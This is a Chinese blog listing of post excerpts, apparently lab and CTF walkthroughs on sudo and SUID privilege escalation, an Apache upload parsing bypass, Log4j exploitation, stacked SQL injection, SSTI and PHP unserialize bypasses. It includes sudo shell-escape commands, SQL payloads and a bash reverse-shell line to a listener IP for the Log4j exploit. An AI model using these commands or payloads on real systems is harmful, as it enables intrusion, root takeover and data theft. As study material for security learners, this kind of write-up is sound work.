- 博客(24)
- 收藏
- 关注
原创 sudo提权
sudo权限的配置文件位于/etc/sudoers,当普通用户使用sudo命令时,linux系统会在sudoers文件中查找当前用户,根据当前用户权限配置来决定是否可以运行相关命令。利用less提权:输入sudo less /etc/hosts浏览文件内容时,在底部输入!利用man提权:通过sudo man man命令打开man使用手册,同时会进入编辑行,输入!利用vi提权:通过sudo vi会进入默认页,输入:!利用perl提权:sudo perl -e 'exec "/bin/bash";
2023-07-20 10:31:31
1422
原创 SUID提权(find配置不当)
备份passwd文件,使用openssl passwd生成一个密码,再使用python搭建一个http服务,然后使用本地物理机下载passwd备份文件。在本地使用python开启http服务并将passwd备份文件放到该目录下,使用wget -0下载该备份文件并覆盖原有的passwd文件。suid权限解释:当文件被设置了suid权限后表示该文件被执行时会将当前的用户权限暂时切换为文件所有者的权限(所有者一般为root)发现find命令,使用find的-exec参数将wget命令也增加suid权限。
2023-07-19 19:39:55
376
原创 Apache解析漏洞
Apache解析漏洞成因:Apache默认一个文件允许有多个.来分隔后缀,当解析文件时从右向左解析,直到碰到能够解析的后缀名,就将该文件作为这个后缀名的文件来执行。2、尝试Apache的解析漏洞,将文件名修改为1.php.pnga,然后修改hex值,将a所对应的hex值更改为0a,然后发送,发现成功上传。1、上传一个1.php,发现该文件类型不被支持,且返回包中含有Apache的版本信息。3、使用蚁剑可以成功连接。
2023-07-12 14:18:00
364
原创 Log4j(CVE-2021-44228)
使用POC: bash -i >& /dev/tcp/192.168.211.130/6666 0>&1,然后对该POC进行base64编码,使用漏洞利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar(工具要在kali中使用,windows中使用无效)进入到vulhub里的指定漏洞库,打开环境:docker-compose up -d。选择工具生成的一个exp进行利用,访问后成功反弹shell。
2023-07-12 10:43:03
152
1
原创 supersqli
首先输入有个单引号,出现报错信息,说明是单引号闭合的字符型注入 输入'#发现成功闭合 使用order by判断出字段数为2,然后使用select查询,但发现select被过滤了 然后我们可以尝试堆叠注入,输入:';show tables;--+,发现存在两个表 查看表的结构:这里由于有一个表的名字为纯数字,所以需要使用反引号括起来,payload为:';show columns from `1919810931114514`;--+,发现存在一列为flag 想要查询flag列但select
2023-06-12 13:46:40
100
原创 SSTI(模板注入)
SSTI注入形成示例如下:payload:{{config}}(用来测试是否存在SSTI注入)SSTI基本的思路就是通过找到合适的魔术方法,一步步去执行,从而得到我们想要的结果。返回结果成功执行系统命令并显示whoami信息。一个简单的使用flask创建的web服务器程序。安全的flask程序编写如下。控制台下也会产生访问记录。
2023-06-02 20:06:03
406
原创 Web_php_unserialize
_wakeup函数:unserialize函数会检查是否存在wakeup函数,如果存在,则会先调用__wakeup函数,预先准备对象所需的资源。__wakeup()执行漏洞,一个字符串或对象被序列化后,如果其属性被修改,则不执行__wakeup函数,这是一个绕过点。__construct函数:具有该函数的类会在每次创建对象时先调用此方法,作初始化工作。__destruct函数:会在某个对象的所有引用都被删除或者对象被显示销毁时执行。__sleep函数会在序列化之前被调用。拿到题目看到一段代码。
2023-06-01 17:52:54
127
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人